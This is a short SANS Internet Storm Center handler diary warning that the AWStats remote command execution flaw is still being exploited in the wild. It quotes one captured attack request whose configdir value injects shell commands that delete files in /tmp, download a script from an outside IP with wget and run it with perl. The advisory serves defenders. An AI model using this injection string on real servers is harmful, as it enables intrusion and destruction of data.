Threat Level: green Handler on Duty: Johannes Ullrich

SANS ISC: AWSTATS SANS ISC InfoSec Forums

Watch ISC TV. Great for NOCs, SOCs and Living Rooms: https://isctv.sans.edu

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
AWSTATS
AWSTATS has been a very frequent flyer as an email subject to us since the first vulnerability dealing with remote command execution was released this past January.  I went back through my old emails and since then we have gotten 77 emails all dealing with seeing this exploit in the wild, some successful, some not successful.  It has gotten more difficult to distinguish what is old and what is new.  Its all starting to blend together like all the SDbot variants running around out there (got one of those in the mail today too).  We received more reports today of the following activity taking place so keep your eyes open.

GET //awstats.pl?configdir=|echo
%20;cd%20/tmp;rm%20-rf%20*;wget%20http://218.188.9.19/.it/abc;perl%20abc;echo%20;rm%20-rf%20abc*;echo| HTTP/1.1

Also, see the diary by fellow handler Erik Fichtner dated August 29, 2005 for more on this.



Lorna

165 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!